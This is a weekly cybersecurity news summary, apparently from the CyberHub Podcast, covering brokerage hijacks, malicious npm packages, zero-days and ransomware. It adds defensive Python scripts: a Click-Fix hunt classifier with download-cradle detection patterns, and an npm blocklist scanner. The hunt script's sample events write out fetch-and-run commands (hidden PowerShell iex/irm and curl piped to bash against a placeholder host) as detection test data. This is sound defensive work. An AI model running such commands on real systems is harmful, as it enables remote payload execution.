Top Cybersecurity News Weekly Summary – Week of May 12th, 2025
From billion-dollar market hacks to steel mills gone dark—why this week proved (again) that cyber is the heartbeat of global business
Happy Friday, Security Gang!
If Patch Tuesday felt like a heavyweight bout, the rest of the week came in swinging with body blows to every sector that keeps our economy humming. We watched Tokyo’s brokerage accounts get hijacked for $2 billion, Chinese operators burrow into the drone supply chain, and America’s largest steelmaker hit the kill switch on its furnaces—all before I could finish my second espresso.
Add in fresh zero-days from Microsoft and Fortinet, a record-shattering privacy verdict in Texas, and ransomware still starving U.K. grocery shelves, and you’ve got a masterclass in how digital risk translates straight to boardroom panic (and supply-chain chaos). Grab your coffee, buckle up, and let’s dissect the week’s lessons so you can walk into Monday’s stand-ups armed with action—not anxiety. Coffee-cup cheers, y’all.
Below, the stories are grouped by theme so you can scan what matters, share with leadership, and tighten defenses before Monday’s inbox flood.
Financial Systems & Market Manipulation
• Japanese brokerage raid — $2 B in fake trades: 5,000 accounts were looted using stolen creds, then used to pump thinly-traded Chinese equities. The FSA quietly removed references to China, hinting at diplomatic pressure and a widening probe.
Software Supply-Chain & Developer Risk
• Malicious npm packages target Cursor AI fans: Three packages (sw-cur*, aiide-cur), still live on npm at time of writing, overwrite binaries and phone home, giving attackers code execution inside developer environments. More than 3,200 installs show how a “cheap AI access” pitch lures engineers.
• Fake “AI tool” sites spread Noodlophile stealer: Viral Facebook ads push a polished installer that siphons cookies, wallets, and cloud tokens—no phishing email required.
Enterprise Apps & Patching Pressure
• SAP NetWeaver Visual Composer zero-day: CVE-2025-31324 (CVSS 10) plus a new deserialisation bug are feeding both ransomware gangs and China’s “Chaya” APT. 200+ servers still exposed.
• Microsoft drops 70 fixes, 5 in-the-wild zero-days: Four privilege-escalation flaws in CLFS/AFD/DWM and a scripting-engine RCE can be chained for full takeover.
• Fortinet FortiVoice RCE, Ivanti EPMM double zero-day, Adobe’s 39-patch mega-rollout, VMware Tools file-tamper bug, ASUS DriverHub RCE, Chrome 136 fixes: A reminder that “Patch Tuesday” now lasts all week.
Infrastructure & Manufacturing Disruption
• Nucor Steel shuts mills: IT breach forced a full stop at America’s biggest steel producer; ERP is tightly meshed with furnace controls.
• Nova Scotia Power breach: Attackers stole unencrypted bank-account data and consumption records—billing PII is still living in legacy systems.
• Co-op UK stores still half-empty: Five weeks after DragonForce ransomware, only 20 % of normal stock is shipping; critics blast weak continuity planning.
Retail, Education & Media
• Scattered Spider lands in U.S. retail: Google TAG says the SIM-swap masters behind Marks & Spencer and Harrods hits are now probing American chains.
• iClicker & Click-Fix evolution: A fake CAPTCHA on the compromised iClicker site tricked students into pasting PowerShell/Bash commands; APT-36 now serves Linux payloads too.
• Lee Enterprises: $2 M in recovery costs: February ransomware stalled billing for 70 newspapers, proving even short outages bleed cash.
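For the Click-Fix item above, here is an added example of the triage logic I'd want in a hunt query. It is my own code, not anything from the iClicker story or a vendor tool: the event fields, hostnames, URLs and sample commands are constructed for the demo. The key signal is the same on both platforms the story mentions: a shell spawned from where a user pastes (explorer.exe behind the Windows Run dialog, a terminal on Linux) with a download cradle or hidden-window flag in the command line.

```python
"""Added example (not from the original post): triage process-creation
events for Click-Fix activity, where a victim pastes a one-liner into the
Windows Run dialog or a Linux terminal. Field names and sample events are
constructed for the demo, not taken from any real EDR."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    user: str
    parent: str    # parent process image (basename)
    image: str     # child process image (basename)
    cmdline: str


# Interpreters a pasted Windows one-liner usually lands in.
WIN_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
NIX_SHELLS = {"bash", "sh", "zsh", "dash"}

# Stealth flags and download cradles common in pasted PowerShell.
WIN_CRADLE = re.compile(
    r"(?i)(-w(indowstyle)?\s+hidden"
    r"|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"
    r"|\biex\b|invoke-expression|\birm\b|invoke-webrequest"
    r"|downloadstring|mshta\s+https?://)")
# Linux variant: fetch something from the web and pipe it straight into a shell.
NIX_CRADLE = re.compile(r"(?i)\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")


def classify(ev: ProcEvent):
    """Return (severity, reason) for a suspicious event, else None.
    explorer.exe as the parent means the command came in via Win+R,
    which is exactly how Click-Fix lures get executed."""
    image, parent = ev.image.lower(), ev.parent.lower()
    if image in WIN_SHELLS and WIN_CRADLE.search(ev.cmdline):
        sev = "high" if parent == "explorer.exe" else "medium"
        return sev, "download cradle or hidden-window flag in shell command"
    if image in NIX_SHELLS and NIX_CRADLE.search(ev.cmdline):
        return "medium", "web fetch piped straight into a shell"
    return None


def hunt(events):
    """Filter a batch of events down to the ones worth an analyst's time."""
    hits = []
    for ev in events:
        verdict = classify(ev)
        if verdict:
            hits.append({"host": ev.host, "user": ev.user,
                         "severity": verdict[0], "reason": verdict[1]})
    return hits


# Constructed sample telemetry; hostnames and URLs are placeholders.
SAMPLE_EVENTS = [
    ProcEvent("W1", "alice", "explorer.exe", "powershell.exe",
              'powershell -w hidden -c "iex (irm https://captcha.example.invalid/verify)"'),
    ProcEvent("W2", "bob", "code.exe", "powershell.exe",
              "powershell -NoProfile -File build.ps1"),
    ProcEvent("L1", "carol", "gnome-terminal-server", "bash",
              "bash -c 'curl -fsSL https://captcha.example.invalid/check.sh | bash'"),
    ProcEvent("W3", "dan", "explorer.exe", "powershell.exe",
              "powershell -ep bypass -enc SQBFAFgAIAAoAEkAUgBNACAAaAB0AHQAcAA="),
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

Run as-is it flags the two Run-dialog PowerShell events as high and the curl-into-bash event as medium, while the developer running a build script from VS Code stays quiet. Map `parent`, `image` and `cmdline` onto whatever your EDR calls them and you have a starting query; tune the cradle patterns to your own admin tooling before turning it into an alert.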
Healthcare & Privacy
• Ascension vendor leaks 437 k patient files: Another MOVEit-linked supply-chain wound highlights why HIPAA risk now hides in third-party portals.
• Texas wins $1.375 B privacy settlement against Google: Record payout over clandestine location and biometric tracking raises the enforcement bar for every state AG.
Law-Enforcement & Botnet Takedowns
• 5Socks proxy empire dismantled: A 20-year-old Russian-run botnet renting 7,000 proxies for $10/month is finally offline; only 10 % of its malware ever triggered AV alerts.
Geopolitics & Nation-State Ops
• Earth Ammit hits drone supply chain: Chinese actor compromised Taiwanese/S. Korean vendors, planting backdoors that could jump to defense and satellite customers.
• Bulgaria-based GRU spy ring sentenced: 50 years cumulative—for hirelings surveilling Ukrainian troop sites and European dissidents—shows Moscow’s growing use of freelance assets.
• Poland boots Russia’s Kraków consulate: Warsaw blames Kremlin operatives for mall arson, underlining the fusion of physical sabotage and cyber operations.
📌 Fast Action Checklist
Enforce phishing-resistant MFA on brokerage, retail, and ERP portals to kill credential replay.
Block malicious NPM names (sw-cur*, aiide-cur) and scan dev endpoints for replaced binaries.
Patch SAP CVE-2025-31324 now; restrict or disable the Visual Composer uploader until fully remediated.
Deploy Microsoft, Fortinet, Ivanti, Adobe, Chrome & ASUS fixes in that order—zero-days first.
Hunt for CLFS/AFD privilege-escalation traces in EDR and domain-controller logs.
Segment IT/OT networks; rehearse “pull-the-plug” drills like Nucor’s to prevent unsafe plant shutdowns.
Audit proxy traffic for leftover 5Socks IOCs; block unusual TCP/443 exits from non-proxy hosts.
Educate staff on Click-Fix and fake AI lures; where users don’t need them, restrict the Run dialog and PowerShell by policy, and alert on shells spawned from explorer.exe with hidden-window or download-cradle flags.
Tokenise or encrypt bank-account fields in utility, retail and healthcare billing systems; PCI DSS formally covers card data, but account numbers deserve the same handling, as the Nova Scotia Power breach shows.
Review cyber-insurance terms; ensure ransom payments don’t violate local “no-pay” or OFAC rules and that continuity plans cover offline billing.
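Here is one way to action the npm item on the checklist, written for this summary rather than taken from npm or the researchers who found the packages. It scans a project’s package.json and lockfile for the names called out this week and, as a general hygiene check the story itself doesn’t spell out, lists every resolved package that runs an install hook, since that is the mechanism a package uses to tamper with binaries at install time. The sample manifest and lockfile are constructed; version numbers in them are placeholders.

```python
"""Added example (not from the original post or from npm): scan an npm
project for the package names called out this week (sw-cur*, aiide-cur)
and for packages that run install hooks. Reads package.json and a
lockfileVersion 2/3 package-lock.json. Sample inputs are constructed."""
import fnmatch
import json
import sys

# Patterns as written in the report; '*' is a glob, so sw-cur1 etc. match.
BLOCKLIST = ("sw-cur*", "aiide-cur")


def is_blocked(name, blocklist=BLOCKLIST):
    """True when a package name matches any blocklist glob (case-sensitive)."""
    return any(fnmatch.fnmatchcase(name, pat) for pat in blocklist)


def name_from_lock_path(path):
    """Lockfile keys are install paths: 'node_modules/a/node_modules/@s/b' -> '@s/b'."""
    return path.rsplit("node_modules/", 1)[-1]


def scan_manifest(manifest):
    """Direct dependencies declared in package.json."""
    hits = []
    for field in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in manifest.get(field, {}).items():
            if is_blocked(name):
                hits.append({"name": name, "version": spec,
                             "reason": f"blocklisted name ({field})"})
    return hits


def scan_lockfile(lock):
    """Every resolved package, transitive ones included. npm sets
    hasInstallScript: true on packages with preinstall/install/postinstall
    hooks, so those are reported for review even when the name is clean."""
    hits = []
    for path, meta in lock.get("packages", {}).items():
        if path == "":          # root project entry
            continue
        name = name_from_lock_path(path)
        if is_blocked(name):
            hits.append({"name": name, "version": meta.get("version"),
                         "reason": "blocklisted name"})
        elif meta.get("hasInstallScript"):
            hits.append({"name": name, "version": meta.get("version"),
                         "reason": "runs install hook (review)"})
    return hits


# Constructed sample files, not a real project; versions are placeholders.
SAMPLE_MANIFEST = {"dependencies": {"express": "^4.19.0", "aiide-cur": "^1.0.0"}}
SAMPLE_LOCK = {
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo"},
        "node_modules/express": {"version": "4.19.2"},
        "node_modules/aiide-cur": {"version": "1.0.3", "hasInstallScript": True},
        "node_modules/aiide-cur/node_modules/sw-cur1": {"version": "0.0.7", "hasInstallScript": True},
        "node_modules/esbuild": {"version": "0.21.0", "hasInstallScript": True},
    },
}

if __name__ == "__main__":
    # Usage: python scan.py [package.json] [package-lock.json]; defaults to the samples.
    manifest = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_MANIFEST
    lock = json.load(open(sys.argv[2])) if len(sys.argv) > 2 else SAMPLE_LOCK
    for hit in scan_manifest(manifest) + scan_lockfile(lock):
        print(f"{hit['reason']:28} {hit['name']}@{hit['version']}")
```

Two things worth knowing before you wire this into CI: the glob `sw-cur*` will also catch any unrelated package whose name starts with `sw-cur`, so treat blocklist hits as a stop-and-look, and the install-hook list will include perfectly legitimate native packages (esbuild in the sample), so it is a review queue, not a fail condition. Pair it with a hash check of the tool binaries on developer machines to cover the “replaced binaries” half of the checklist item.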
Stay cyber safe, Security Gang!
🚨 Important Links to Follow:
👉Website:
👉Listen here: https://linktr.ee/cyberhubpodcast
✅ Stay Connected With Us.
👉LinkedIn: https://www.linkedin.com/company/cyberhubpodcast/
👉Twitter (X): https://twitter.com/cyberhubpodcast
👉Instagram: https://www.instagram.com/cyberhubpodcast
🤝 For Business Inquiries: info@cyberhubpodcast.com
=============================
🚀 About The CyberHub Podcast.
The Hub of the Infosec Community.
Our mission is to provide substantive and quality content that’s more than headlines or sales pitches. We want to be a valuable source to assist those cybersecurity practitioners in their mission to keep their organizations secure.
Tune in to our podcast Monday through Thursday at 9AM EST for the latest news.
For Collaboration and Business inquiries, please use the contact information below:
📩 Email: info@cyberhubpodcast.com